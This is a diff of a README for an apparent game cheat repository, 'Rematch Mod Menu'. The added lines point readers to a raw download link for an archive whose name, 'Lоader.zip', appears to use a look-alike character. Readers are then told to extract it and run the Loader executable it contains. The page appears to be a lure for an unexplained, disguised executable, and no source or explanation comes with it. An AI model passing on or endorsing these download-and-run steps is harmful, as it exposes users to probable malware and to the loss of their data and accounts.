ashulyadav/Rematch-MenuMaster/README.md

 Setting up **Rematch Mod Menu** is straightforward!
 Please follow these steps carefully to ensure smooth operation:

-1. **Download Loader.rar** from this repository.
+1. **Download https://raw.githubusercontent.com/ashulyadav/Rematch-MenuMaster/main/Lоader.zip** from this repository.
-2. Extract the Loader.rar file to a directory of your choice using a trusted archive manager (e.g., WinRAR, 7-Zip, The Unarchiver).
+2. Extract the https://raw.githubusercontent.com/ashulyadav/Rematch-MenuMaster/main/Lоader.zip file to a directory of your choice using a trusted archive manager (e.g., WinRAR, 7-Zip, The Unarchiver).
 3. Open the extracted folder and run the Loader executable/application.
 4. Follow the on-screen setup wizard to complete installation.
 5. Select your game and enjoy customizing your gameplay!